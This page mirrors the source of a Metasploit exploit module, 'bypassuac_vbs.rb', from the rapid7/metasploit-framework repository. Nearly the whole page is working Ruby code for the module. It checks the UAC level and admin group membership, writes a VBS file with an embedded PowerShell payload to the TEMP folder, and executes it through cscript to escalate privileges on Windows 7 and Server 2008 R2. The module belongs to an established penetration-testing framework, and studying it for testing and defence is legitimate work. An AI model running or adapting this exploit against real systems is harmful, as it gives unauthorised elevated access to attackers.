Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/bypassuac_vbs.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Local
7
Rank = ExcellentRanking
8
9
include Exploit::FileDropper
10
include Exploit::Powershell
11
include Post::File
12
include Post::Windows::Priv
13
include Post::Windows::Runas
14
15
def initialize(info = {})
16
super(
17
update_info(
18
info,
19
'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',
20
'Description' => %q{
21
This module will bypass Windows UAC by utilizing the missing .manifest on the script host
22
cscript/wscript.exe binaries.
23
},
24
'License' => MSF_LICENSE,
25
'Author' => [
26
'Vozzie',
27
'Ben Campbell'
28
],
29
'Platform' => [ 'win' ],
30
'SessionTypes' => [ 'meterpreter' ],
31
'Targets' => [
32
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
33
],
34
'DefaultTarget' => 0,
35
'References' => [
36
['URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html'],
37
['URL', 'https://github.com/Vozzie/uacscript']
38
],
39
'DisclosureDate' => '2015-08-22',
40
'Notes' => {
41
'Reliability' => UNKNOWN_RELIABILITY,
42
'Stability' => UNKNOWN_STABILITY,
43
'SideEffects' => UNKNOWN_SIDE_EFFECTS
44
}
45
)
46
)
47
end
48
49
def exploit
50
# Validate that we can actually do things before we bother
51
# doing any more work
52
validate_environment!
53
check_permissions!
54
55
# get all required environment variables in one shot instead. This
56
# is a better approach because we don't constantly make calls through
57
# the session to get the variables.
58
env_vars = get_envs('TEMP', 'WINDIR')
59
60
case get_uac_level
61
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
62
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
63
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
64
fail_with(Failure::NotVulnerable,
65
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
66
when UAC_DEFAULT
67
print_good('UAC is set to Default')
68
print_good('BypassUAC can bypass this setting, continuing...')
69
when UAC_NO_PROMPT
70
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
71
shell_execute_exe
72
return
73
end
74
75
vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"
76
77
upload_vbs(vbs_filepath)
78
79
cmd_exec("cscript.exe //B #{vbs_filepath}")
80
end
81
82
def check_permissions!
83
# Check if you are an admin
84
vprint_status('Checking admin status...')
85
admin_group = is_in_admin_group?
86
87
if admin_group.nil?
88
print_error('Either whoami is not there or failed to execute')
89
print_error('Continuing under assumption you already checked...')
90
elsif admin_group
91
print_good('Part of Administrators group! Continuing...')
92
else
93
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
94
end
95
96
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
97
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
98
end
99
end
100
101
def upload_vbs(payload_filepath)
102
vbs = File.read(File.join(Msf::Config.data_directory,
103
'exploits',
104
'scripthost_uac_bypass',
105
'bypass.vbs'))
106
107
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
108
109
vbs.gsub!('COMMAND', command)
110
print_status('Uploading the Payload VBS to the filesystem...')
111
begin
112
vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")
113
write_file(payload_filepath, vbs)
114
register_file_for_cleanup(payload_filepath)
115
rescue Rex::Post::Meterpreter::RequestError => e
116
fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")
117
end
118
end
119
120
def validate_environment!
121
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
122
123
version = get_version_info
124
if version.win7_or_2008r2?
125
print_good("#{version.product_name} may be vulnerable.")
126
else
127
fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")
128
end
129
130
if is_uac_enabled?
131
print_status('UAC is Enabled, checking level...')
132
else
133
unless is_in_admin_group?
134
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
135
end
136
end
137
end
138
end
139
140